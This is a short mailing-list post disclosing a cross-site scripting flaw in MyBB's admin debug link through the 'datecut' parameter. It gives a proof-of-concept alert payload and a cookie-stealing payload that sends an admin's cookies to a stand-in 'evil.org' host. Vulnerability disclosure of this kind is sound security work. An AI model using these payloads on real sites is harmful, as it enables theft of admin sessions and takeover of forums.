XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)

["Parikh, Dominic" <Dominic.Parikh () stpauls richmond sch uk>]

XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am apalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.

At the bottom of every page shown to the admins is a debug link. 
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try: 
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</scrip
t>'

Although only admins can exploit this vuln, someone could send them a
link such as 
[forumdisplay.php?fid=2&datecut=
<http://www.forum.com/forumdisplay.php?fid=2&datecut=>
""><script>window.location="http://evil.org/steal.php?cookie="+document.
cookie</script>] 
and ouch!

robokoder
fusionnx.com- The Web Developer's Resource Centre




#####################################################################################

This email has been scanned by MailMarshal, an email content filter. 

#####################################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/